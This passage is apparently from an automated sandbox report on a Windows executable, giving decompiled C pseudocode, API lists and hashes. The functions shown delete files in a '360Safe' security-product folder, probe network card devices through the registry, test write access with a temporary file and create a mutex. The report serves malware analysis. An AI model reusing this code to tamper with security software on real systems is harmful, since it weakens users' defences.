                                                                                                                                                                                          0x00cedcf4
                                                                                                                                                                                          0x00cedcf4
                                                                                                                                                                                          0x00cedcf5
                                                                                                                                                                                          0x00cedcf9
                                                                                                                                                                                          0x00cedcfa
                                                                                                                                                                                          0x00cedd03
                                                                                                                                                                                          0x00cedd07
                                                                                                                                                                                          0x00cedd0f
                                                                                                                                                                                          0x00cedd13
                                                                                                                                                                                          0x00cedd18
                                                                                                                                                                                          0x00cedd1c
                                                                                                                                                                                          0x00cedd20
                                                                                                                                                                                          0x00cedd21
                                                                                                                                                                                          0x00cedd2a
                                                                                                                                                                                          0x00cedd2e
                                                                                                                                                                                          0x00cedd36
                                                                                                                                                                                          0x00cedd36
                                                                                                                                                                                          0x00cedd55
                                                                                                                                                                                          0x00cedd5d
                                                                                                                                                                                          0x00cedd65
                                                                                                                                                                                          0x00cedd65
                                                                                                                                                                                          0x00cedd6d
                                                                                                                                                                                          0x00cedd6d
                                                                                                                                                                                          0x00cedd75
                                                                                                                                                                                          0x00cedd80
                                                                                                                                                                                          0x00cedd88
                                                                                                                                                                                          0x00cedd89
                                                                                                                                                                                          0x00cedd8a
                                                                                                                                                                                          0x00cedd9f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00CEDB48
                                                                                                                                                                                            • Part of subcall function 00D032A3: __wcstoi64.LIBCMT ref: 00D03280
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CEDB88
                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,00D5D014,00000026,00000000,?,?,00000018), ref: 00CEDBA4
                                                                                                                                                                                          • PathCombineW.SHLWAPI(00000000,00000000,?,360\360Safe,?,?,00000018), ref: 00CEDBCB
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?,?,?,00000018), ref: 00CEDBE0
                                                                                                                                                                                          • PathIsDirectoryW.SHLWAPI(?), ref: 00CEDBF3
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000018), ref: 00CEDBFC
                                                                                                                                                                                            • Part of subcall function 00C9CCC5: InterlockedIncrement.KERNEL32(-000000F4), ref: 00C9CD08
                                                                                                                                                                                          • PathIsDirectoryW.SHLWAPI(?), ref: 00CEDC17
                                                                                                                                                                                          • PathIsDirectoryEmptyW.SHLWAPI(?), ref: 00CEDC20
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00CEDC43
                                                                                                                                                                                          • CharUpperW.USER32(?,?,?,\360Safe,?,?,?,00000018), ref: 00CEDCD1
                                                                                                                                                                                          • CharUpperW.USER32(?,?,?,00000018), ref: 00CEDCDE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Path$Directory$CharFileUpper$CombineCountDeleteEmptyExistsFolderH_prolog3IncrementInterlockedSpecialTick__wcstoi64_memset
                                                                                                                                                                                          • String ID: 360\360Safe$\360Safe
                                                                                                                                                                                          • API String ID: 1139632788-3795500535
                                                                                                                                                                                          • Opcode ID: 9be22f9a2192fa8fb65e8734d58b410dd00d157c86c70925a38acdfe56705acc
                                                                                                                                                                                          • Instruction ID: 0239826045a6be05c13fee1eab0b7aba4256a5d2f966a9b590150dceb6c97799
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9be22f9a2192fa8fb65e8734d58b410dd00d157c86c70925a38acdfe56705acc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D710D7190025AEFCF01EBA4CD89AEEB778BF14304F104429A516A3191EB74AA08DB71
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CFEB30 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 165registrystringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 315 cfeb30-cfeb52 316 cfeb58-cfeb60 315->316 317 cfed31-cfed48 call d0071a 315->317 316->317 318 cfeb66-cfeb92 call d006a0 RegOpenKeyExA 316->318 323 cfecf8-cfecfd 318->323 324 cfeb98-cfebc4 RegEnumKeyExA 318->324 323->317 325 cfecff-cfed30 call c927a0 call d0071a 323->325 326 cfeceb-cfecf7 RegCloseKey 324->326 327 cfebca 324->327 326->323 329 cfebd0-cfebee RegOpenKeyExA 327->329 331 cfecb9-cfece1 RegEnumKeyExA 329->331 332 cfebf4-cfec26 RegQueryValueExA 329->332 331->329 336 cfece7 331->336 334 cfecae-cfecb3 RegCloseKey 332->334 335 cfec2c-cfec4d call d006a0 call cfea20 332->335 334->331 341 cfec52-cfec57 335->341 336->326 341->334 342 cfec59-cfec5e 341->342 343 cfec72-cfec84 342->343 344 cfec60-cfec70 lstrcmpA 342->344 345 cfec86-cfec8e 343->345 344->334 344->343 346 cfeca1-cfeca3 345->346 347 cfec90-cfec95 345->347 349 cfeca6-cfeca9 346->349 350 cfeca5 346->350 347->346 348 cfec97-cfec9d 347->348 348->345 351 cfec9f 348->351 349->334 350->349 351->350
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E00CFEB30(CHAR* _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v16;
				char _v264;
				char _v524;
				char _v624;
				char _v724;
				CHAR* _v728;
				int _v732;
				int _v736;
				void* _v740;
				int _v744;
				void* _v748;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				long _t49;
				long _t54;
				long _t58;
				long _t60;
				long _t62;
				void* _t66;
				char* _t67;
				void* _t70;
				int _t71;
				char _t87;
				void* _t94;
				CHAR* _t96;
				void* _t97;
				int _t98;
				void* _t100;
				signed int _t101;

				_t101 =  &_v748;
				_t43 =  *0xd64070; // 0x8a9e1774
				_v4 = _t43 ^ _t101;
				_t96 = _a4;
				_v728 = _t96;
				if(_t96 == 0 || _a8 == 0) {
					L24:
					return E00D0071A(0, _t70, _v4 ^ _t101, _t88, _t96, _t97);
				} else {
					E00D006A0(_t96,  &_v724, 0, 0x64);
					_t101 = _t101 + 0xc;
					_t49 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkCards", 0, 8,  &_v748); // executed
					if(_t49 == 0) {
						_push(_t70);
						_push(_t97);
						_t71 = 0;
						_t88 =  &_v744;
						_t98 = 0x104;
						_v744 = 0x104;
						_t54 = RegEnumKeyExA(_v748, 0,  &_v524,  &_v744, 0, 0, 0, 0); // executed
						if(_t54 == 0) {
							do {
								_t58 = RegOpenKeyExA(_v748,  &_v524, 0, 1,  &_v740); // executed
								if(_t58 == 0) {
									_t92 = _v740;
									_v736 = 1;
									_v732 = _t98;
									_t62 = RegQueryValueExA(_v740, "ServiceName", 0,  &_v736,  &_v264,  &_v732); // executed
									if(_t62 == 0) {
										E00D006A0(_t96,  &_v624, _t62, 0x64);
										_t96 =  &_v624;
										_t66 = E00CFEA20(_t92, _t96,  &_v264, 0x64);
										_t101 = _t101 + 0x14;
										if(_t66 != 0 && (_v724 == 0 || lstrcmpA(_t96,  &_v724) < 0)) {
											_t67 =  &_v724;
											_t94 = 0x64;
											_t100 =  &_v624 - _t67;
											while(1) {
												_t27 = _t94 + 0x7fffff9a; // 0x7ffffffe
												if(_t27 == 0) {
													break;
												}
												_t87 =  *((intOrPtr*)(_t100 + _t67));
												if(_t87 == 0) {
													break;
												} else {
													 *_t67 = _t87;
													_t67 = _t67 + 1;
													_t94 = _t94 - 1;
													if(_t94 != 0) {
														continue;
													} else {
														L16:
														_t67 = _t67 - 1;
													}
												}
												L17:
												 *_t67 = 0;
												_t98 = 0x104;
												goto L18;
											}
											if(_t94 == 0) {
												goto L16;
											}
											goto L17;
										}
									}
									L18:
									RegCloseKey(_v740);
								}
								_t88 = _v748;
								_t71 = _t71 + 1;
								_v744 = _t98;
								_t60 = RegEnumKeyExA(_v748, _t71,  &_v524,  &_v744, 0, 0, 0, 0); // executed
							} while (_t60 == 0);
							_t96 = _v728;
						}
						RegCloseKey(_v748);
						_pop(_t97);
						_pop(_t70);
					}
					if(_v724 == 0) {
						goto L24;
					} else {
						return E00D0071A(0 | E00C927A0(_t96, _a8,  &_v724) >= 0x00000000, _t70, _v16 ^ _t101, _a8, _t96, _t97);
					}
				}
			}



































                                                                                                                                                                                          0x00cfeb30
                                                                                                                                                                                          0x00cfeb36
                                                                                                                                                                                          0x00cfeb3d
                                                                                                                                                                                          0x00cfeb45
                                                                                                                                                                                          0x00cfeb4c
                                                                                                                                                                                          0x00cfeb52
                                                                                                                                                                                          0x00cfed31
                                                                                                                                                                                          0x00cfed48
                                                                                                                                                                                          0x00cfeb66
                                                                                                                                                                                          0x00cfeb6f
                                                                                                                                                                                          0x00cfeb74
                                                                                                                                                                                          0x00cfeb8a
                                                                                                                                                                                          0x00cfeb92
                                                                                                                                                                                          0x00cfeb9c
                                                                                                                                                                                          0x00cfeb9d
                                                                                                                                                                                          0x00cfeb9e
                                                                                                                                                                                          0x00cfeba4
                                                                                                                                                                                          0x00cfebb2
                                                                                                                                                                                          0x00cfebb8
                                                                                                                                                                                          0x00cfebbc
                                                                                                                                                                                          0x00cfebc4
                                                                                                                                                                                          0x00cfebd0
                                                                                                                                                                                          0x00cfebe6
                                                                                                                                                                                          0x00cfebee
                                                                                                                                                                                          0x00cfebf9
                                                                                                                                                                                          0x00cfec12
                                                                                                                                                                                          0x00cfec1a
                                                                                                                                                                                          0x00cfec1e
                                                                                                                                                                                          0x00cfec26
                                                                                                                                                                                          0x00cfec37
                                                                                                                                                                                          0x00cfec46
                                                                                                                                                                                          0x00cfec4d
                                                                                                                                                                                          0x00cfec52
                                                                                                                                                                                          0x00cfec57
                                                                                                                                                                                          0x00cfec72
                                                                                                                                                                                          0x00cfec7f
                                                                                                                                                                                          0x00cfec84
                                                                                                                                                                                          0x00cfec86
                                                                                                                                                                                          0x00cfec86
                                                                                                                                                                                          0x00cfec8e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfec90
                                                                                                                                                                                          0x00cfec95
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfec97
                                                                                                                                                                                          0x00cfec97
                                                                                                                                                                                          0x00cfec99
                                                                                                                                                                                          0x00cfec9a
                                                                                                                                                                                          0x00cfec9d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfec9f
                                                                                                                                                                                          0x00cfeca5
                                                                                                                                                                                          0x00cfeca5
                                                                                                                                                                                          0x00cfeca5
                                                                                                                                                                                          0x00cfec9d
                                                                                                                                                                                          0x00cfeca6
                                                                                                                                                                                          0x00cfeca6
                                                                                                                                                                                          0x00cfeca9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfeca9
                                                                                                                                                                                          0x00cfeca3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfeca3
                                                                                                                                                                                          0x00cfec57
                                                                                                                                                                                          0x00cfecae
                                                                                                                                                                                          0x00cfecb3
                                                                                                                                                                                          0x00cfecb3
                                                                                                                                                                                          0x00cfecb9
                                                                                                                                                                                          0x00cfecd2
                                                                                                                                                                                          0x00cfecd5
                                                                                                                                                                                          0x00cfecd9
                                                                                                                                                                                          0x00cfecdf
                                                                                                                                                                                          0x00cfece7
                                                                                                                                                                                          0x00cfece7
                                                                                                                                                                                          0x00cfecf0
                                                                                                                                                                                          0x00cfecf6
                                                                                                                                                                                          0x00cfecf7
                                                                                                                                                                                          0x00cfecf7
                                                                                                                                                                                          0x00cfecfd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfecff
                                                                                                                                                                                          0x00cfed30
                                                                                                                                                                                          0x00cfed30
                                                                                                                                                                                          0x00cfecfd

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CFEB6F
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards,00000000,00000008,?,?,?,?), ref: 00CFEB8A
                                                                                                                                                                                          • RegEnumKeyExA.KERNEL32 ref: 00CFEBBC
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,?,?,?,?), ref: 00CFEBE6
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32 ref: 00CFEC1E
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CFEC37
                                                                                                                                                                                            • Part of subcall function 00CFEA20: CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000104,00000000), ref: 00CFEA6E
                                                                                                                                                                                          • lstrcmpA.KERNEL32(?,00000000), ref: 00CFEC68
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00CFECB3
                                                                                                                                                                                          • RegEnumKeyExA.KERNEL32 ref: 00CFECD9
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?), ref: 00CFECF0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • ServiceName, xrefs: 00CFEC0C
                                                                                                                                                                                          • SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards, xrefs: 00CFEB80
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseEnumOpen_memset$CreateFileQueryValuelstrcmp
                                                                                                                                                                                          • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards$ServiceName
                                                                                                                                                                                          • API String ID: 2630661138-1795789498
                                                                                                                                                                                          • Opcode ID: 4575fded4b024a6bb1d99865f277a8261d0fc3a367b55a447294c84b0ece1394
                                                                                                                                                                                          • Instruction ID: ad8bebabd014dd3d2b7f8899242c814539b31bfa084bcc82431c0bffa1ec049f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4575fded4b024a6bb1d99865f277a8261d0fc3a367b55a447294c84b0ece1394
                                                                                                                                                                                          • Instruction Fuzzy Hash: F251AEB1204345AFE324CB64CC85FBBB3EDABC4B04F04492DF699D6190E7709A088B63
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CED331 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                          			E00CED331(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t30;
				void* _t37;
				WCHAR* _t43;
				void* _t47;
				long _t55;
				int _t57;
				intOrPtr* _t63;
				void* _t64;
				void* _t65;
				void* _t77;
				void* _t80;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t87;
				long _t88;
				void* _t91;

				_t91 = __eflags;
				_t77 = __edx;
				_t88 = _t87 - 0x104;
				_t85 = _t88 - 4;
				_t30 =  *0xd64070; // 0x8a9e1774
				 *(_t85 + 0x104) = _t30 ^ _t85;
				_push(0x2c);
				E00D0155A(0xd37c3e, __ebx, __edi, __esi);
				_t63 =  *((intOrPtr*)(_t85 + 0x114));
				_t79 = 0;
				_t65 = _t85 - 0x38;
				 *((intOrPtr*)(_t85 - 4)) = 0;
				 *((intOrPtr*)(_t85 - 0x14)) = 0;
				E00CAEF42(_t63, _t65, 0, __esi, _t91);
				_push(_t63);
				_push(_t65);
				 *(_t85 - 0x1c) = _t88;
				 *((char*)(_t85 - 4)) = 1;
				E00C9B6B2(_t88, _t85 + 0x110);
				_t67 = _t85 - 0x38;
				_t37 = E00CED21B(_t63, _t85 - 0x38, 0, __esi, _t91); // executed
				if(_t37 != 0) {
					 *_t85 = 0;
					E00D006A0(0, _t85 + 2, 0, 0x100);
					_push(0x80);
					_push(_t85);
					E00CC1003(_t63, _t67, _t77, 0);
					_t43 =  *0xd5d01c; // 0xd5d014
					 *(_t85 - 0x10) = _t43;
					_push(_t85);
					 *((char*)(_t85 - 4)) = 2;
					E00C9D261(_t85 - 0x10, L"%s\\%s.tf",  *((intOrPtr*)(_t85 + 0x110)));
					_t47 = CreateFileW( *(_t85 - 0x10), 0x120116, 2, 0, 2, 0x80, 0); // executed
					_t83 = _t47;
					__eflags = _t83 - 0xffffffff;
					if(_t83 == 0xffffffff) {
						 *_t63 = GetLastError();
					} else {
						_t55 = E00D00EBB(_t85);
						 *(_t85 - 0x1c) = _t55;
						 *(_t85 - 0x18) = 0;
						_t57 = WriteFile(_t83, _t85, _t55, _t85 - 0x18, 0); // executed
						__eflags = _t57;
						if(_t57 == 0) {
							 *_t63 = GetLastError();
						} else {
							__eflags =  *(_t85 - 0x1c) -  *(_t85 - 0x18);
							if( *(_t85 - 0x1c) ==  *(_t85 - 0x18)) {
								 *((intOrPtr*)(_t85 - 0x14)) = 1;
							}
						}
						CloseHandle(_t83);
						DeleteFileW( *(_t85 - 0x10)); // executed
					}
					E00C9820F(_t85 - 0x10);
					_t79 =  *((intOrPtr*)(_t85 - 0x14));
				}
				E00CED1B9(_t63, _t85 - 0x38, _t77, _t79);
				E00C9820F(_t85 + 0x110);
				 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0xc));
				_pop(_t80);
				_pop(_t84);
				_pop(_t64);
				return E00D0071A(_t79, _t64,  *(_t85 + 0x104) ^ _t85, _t77, _t80, _t84);
			}





















                                                                                                                                                                                          0x00ced331
                                                                                                                                                                                          0x00ced331
                                                                                                                                                                                          0x00ced332
                                                                                                                                                                                          0x00ced338
                                                                                                                                                                                          0x00ced33c
                                                                                                                                                                                          0x00ced343
                                                                                                                                                                                          0x00ced349
                                                                                                                                                                                          0x00ced350
                                                                                                                                                                                          0x00ced355
                                                                                                                                                                                          0x00ced35b
                                                                                                                                                                                          0x00ced35d
                                                                                                                                                                                          0x00ced360
                                                                                                                                                                                          0x00ced363
                                                                                                                                                                                          0x00ced366
                                                                                                                                                                                          0x00ced36b
                                                                                                                                                                                          0x00ced36c
                                                                                                                                                                                          0x00ced375
                                                                                                                                                                                          0x00ced379
                                                                                                                                                                                          0x00ced37d
                                                                                                                                                                                          0x00ced382
                                                                                                                                                                                          0x00ced385
                                                                                                                                                                                          0x00ced38c
                                                                                                                                                                                          0x00ced3cd
                                                                                                                                                                                          0x00ced3d6
                                                                                                                                                                                          0x00ced3e3
                                                                                                                                                                                          0x00ced3e4
                                                                                                                                                                                          0x00ced3e5
                                                                                                                                                                                          0x00ced3ea
                                                                                                                                                                                          0x00ced3ef
                                                                                                                                                                                          0x00ced3f5
                                                                                                                                                                                          0x00ced405
                                                                                                                                                                                          0x00ced409
                                                                                                                                                                                          0x00ced420
                                                                                                                                                                                          0x00ced426
                                                                                                                                                                                          0x00ced428
                                                                                                                                                                                          0x00ced42b
                                                                                                                                                                                          0x00ced483
                                                                                                                                                                                          0x00ced42d
                                                                                                                                                                                          0x00ced431
                                                                                                                                                                                          0x00ced43d
                                                                                                                                                                                          0x00ced445
                                                                                                                                                                                          0x00ced448
                                                                                                                                                                                          0x00ced44e
                                                                                                                                                                                          0x00ced450
                                                                                                                                                                                          0x00ced469
                                                                                                                                                                                          0x00ced452
                                                                                                                                                                                          0x00ced455
                                                                                                                                                                                          0x00ced458
                                                                                                                                                                                          0x00ced45a
                                                                                                                                                                                          0x00ced45a
                                                                                                                                                                                          0x00ced458
                                                                                                                                                                                          0x00ced46c
                                                                                                                                                                                          0x00ced475
                                                                                                                                                                                          0x00ced475
                                                                                                                                                                                          0x00ced488
                                                                                                                                                                                          0x00ced48d
                                                                                                                                                                                          0x00ced48d
                                                                                                                                                                                          0x00ced391
                                                                                                                                                                                          0x00ced39c
                                                                                                                                                                                          0x00ced3a6
                                                                                                                                                                                          0x00ced3ae
                                                                                                                                                                                          0x00ced3af
                                                                                                                                                                                          0x00ced3b0
                                                                                                                                                                                          0x00ced3c5

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00CED350
                                                                                                                                                                                            • Part of subcall function 00CAEF42: __EH_prolog3.LIBCMT ref: 00CAEF49
                                                                                                                                                                                            • Part of subcall function 00C9B6B2: InterlockedIncrement.KERNEL32(-000000D1), ref: 00C9B6C7
                                                                                                                                                                                            • Part of subcall function 00CED21B: __EH_prolog3.LIBCMT ref: 00CED222
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CED3D6
                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,00120116,00000002,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,0000002C), ref: 00CED420
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00CED431
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,0000002C), ref: 00CED448
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,0000002C), ref: 00CED46C
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,0000002C), ref: 00CED475
                                                                                                                                                                                            • Part of subcall function 00C9820F: InterlockedDecrement.KERNEL32 ref: 00C98223
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileH_prolog3$Interlocked$CloseCreateDecrementDeleteHandleIncrementWrite_memset_wcslen
                                                                                                                                                                                          • String ID: %s\%s.tf
                                                                                                                                                                                          • API String ID: 6090230-3749842194
                                                                                                                                                                                          • Opcode ID: 029a47d329d1a349026e54548664015b84b0131aff3dd68cb284a155cc4f94cb
                                                                                                                                                                                          • Instruction ID: 3e24edf6aa7458eb7f307cc15faafca479659690ac03050ce2508d912aa7cd8e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 029a47d329d1a349026e54548664015b84b0131aff3dd68cb284a155cc4f94cb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A416271900248AFDB15EFA5DC4AAEEBBB8FF55300F00401AF916E7291DB749A45CBB1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C89990 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 106synchronizationCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 411 c89990-c89a19 GetCurrentProcessId call c895f0 CreateMutexW 414 c89acf-c89af8 call d0071a 411->414 415 c89a1f-c89a2a GetLastError 411->415 417 c89a2c-c89a2f WaitForSingleObject 415->417 418 c89a35-c89a43 call c89740 415->418 417->418 422 c89a4c-c89a59 call c89fa0 418->422 423 c89a45-c89a4a 418->423 428 c89a5b-c89a62 call c89de0 422->428 429 c89a64 422->429 424 c89ab0-c89ac6 ReleaseMutex 423->424 424->414 426 c89ac8-c89ac9 CloseHandle 424->426 426->414 431 c89a66-c89a71 428->431 429->431 433 c89a73-c89a7f call d00729 431->433 434 c89a84-c89a94 call c89830 431->434 433->434 438 c89aab 434->438 439 c89a96-c89aa6 call d00729 434->439 438->424 439->438
                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                          			E00C89990(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				signed int _t23;
				void* _t28;
				long _t32;
				long _t33;
				long _t34;
				long _t35;
				WCHAR* _t42;
				void* _t44;
				int _t53;
				void* _t54;
				void* _t56;
				void* _t57;
				signed int _t58;
				void* _t60;

				_t51 = __edx;
				_t58 = _t60 - 0x88;
				_push(0xffffffff);
				_push(0xd38a4b);
				_push( *[fs:0x0]);
				_t22 =  *0xd64070; // 0x8a9e1774
				_t23 = _t22 ^ _t58;
				 *(_t58 + 0x84) = _t23;
				_push(_t23);
				 *[fs:0x0] = _t58 - 0xc;
				 *((intOrPtr*)(_t58 - 0x10)) = _t60 - 0x70;
				 *0xd68dcc = 0;
				_push(GetCurrentProcessId());
				_t42 = _t58;
				E00C895F0(_t42, 0x41, L"%s %u", L"1830B7BD-F7A3-4c4d-989B-C004DE465EDE");
				 *((short*)(_t58 + 0x80)) = 0;
				_t53 = 0;
				_t46 = _t42;
				_t28 = CreateMutexW(0, 1, _t42); // executed
				_t56 = _t28;
				 *(_t58 - 0x14) = _t56;
				if(_t56 != 0) {
					if(GetLastError() == 0xb7) {
						WaitForSingleObject(_t56, 0xffffffff);
					}
					 *(_t58 - 4) = 0;
					_t32 = E00C89740();
					if(_t32 == 0) {
						_t33 = E00C89FA0();
						 *(_t58 - 0x20) = _t33;
						 *(_t58 - 4) = 1;
						__eflags = _t33;
						if(__eflags == 0) {
							_t34 = 0;
							__eflags = 0;
						} else {
							_t34 = E00C89DE0(_t46, __eflags, _t33, _t56);
						}
						 *(_t58 - 4) = 0;
						 *0xd68dcc = _t34;
						__eflags = _t34;
						if(_t34 == 0) {
							 *(_t58 - 0x1c) = 1;
							_t51 = _t58 - 0x1c;
							_t34 = E00D00729(_t58 - 0x1c, 0xd59794);
						}
						_t53 = 1;
						 *(_t58 - 0x24) = 1;
						_t35 = E00C89830(_t34);
						__eflags = _t35;
						if(_t35 == 0) {
							 *((intOrPtr*)(_t58 - 0x18)) = 3;
							E00D00729(_t58 - 0x18, 0xd59794);
						}
						_t32 =  *0xd68dcc; // 0x988bd8
